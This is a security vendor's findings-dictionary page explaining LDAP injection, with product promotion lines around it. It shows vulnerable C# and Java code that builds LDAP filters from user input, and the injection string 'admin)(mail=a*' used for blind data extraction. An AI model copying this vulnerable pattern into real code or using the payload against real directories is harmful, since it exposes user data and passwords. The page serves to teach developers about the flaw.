AttackFlow Findings Dictionary

Finding A Way To Try AttackFlow Enterprise Edition?

If so, click to download 15 days full version for free!

LDAP Injection

The attacker can inject unauthorized partial LDAP query strings and steal information, such as user passwords, or apply company wide password guessing attacks

Severity

Critical

Fix Cost

Low

Trust Level

High

LDAP (Lightweight Directory Access Protocol) is a directory service protocol providing a mechanism to search and manipulate Internet directories. It’s common usage is to provide central storage for corporate users information, such as usernames, passwords and etc.

For example, especially in intranet portals, it’s common to provide interfaces to users to enable them searching their colleagues data by providing certain search keywords, such as email addresses or names.

Let the backend code is similar to the following snippet;

                            
DirectorySearcher ds = new DirectorySearcher();
ds.Filter =  "(&(objectClass=user)(name=" + Request["name"] + ")";
SearchResultCollection results = ds.FindAll();
                 
            

For example, by sending admin)(mail=a* as Request["name"], the attacker may deduce that the user with username admin has an email address starting with character a if the result returns the details of the admin user. This is called blind injection and can be an effective method to guess a stored and hashed password easily.

Every injection attack occurs because of mixing code and untrusted data in the code. As developers, we are rarely provided secure APIs in order to keep these two information (code and data) apart, until the runtime. In the above code, mixing the data, as name coming from the user, and code, as the partial LDAP filter in the program, result in LDAP injection. The attacker can potentially manipulate the LDAP filter and access the information that he can’t access otherwise.

LDAP (Lightweight Directory Access Protocol) is a directory service protocol providing a mechanism to search and manipulate Internet directories. It’s common usage is to provide central storage for corporate users information, such as usernames, passwords and etc.

For example, especially in intranet portals, it’s common to provide interfaces to users to enable them searching their colleagues data by providing certain search keywords, such as email addresses or names.

Let the backend code is similar to the following snippet;

            
String searchFilter = "(&(objectClass=user)(name=" + name + "))";
DirContext ctx = new InitialDirContext(env);
NamingEnumeration<SearchResult> answer = ctx.search(searchBase, searchFilter, searchCtls);
...
                
            

For example, by sending admin)(mail=a* as request.getParameter("name"), the attacker may deduce that the user with username admin has an email address starting with character a if the result returns the details of the admin user. This is called blind injection and can be an effective method to guess a stored and hashed password easily.

Every injection attack occurs because of mixing code and untrusted data in the code. As developers, we are rarely provided secure APIs in order to keep these two information (code and data) apart, until the runtime. In the above code, mixing the data, as name coming from the user, and code, as the partial LDAP filter in the program, result in LDAP injection. The attacker can potentially manipulate the LDAP filter and access the information that he can’t access otherwise.

Finding A Way To Purchase AttackFlow Enterprise Edition?

If so, click to buy now for yearly subscriptions!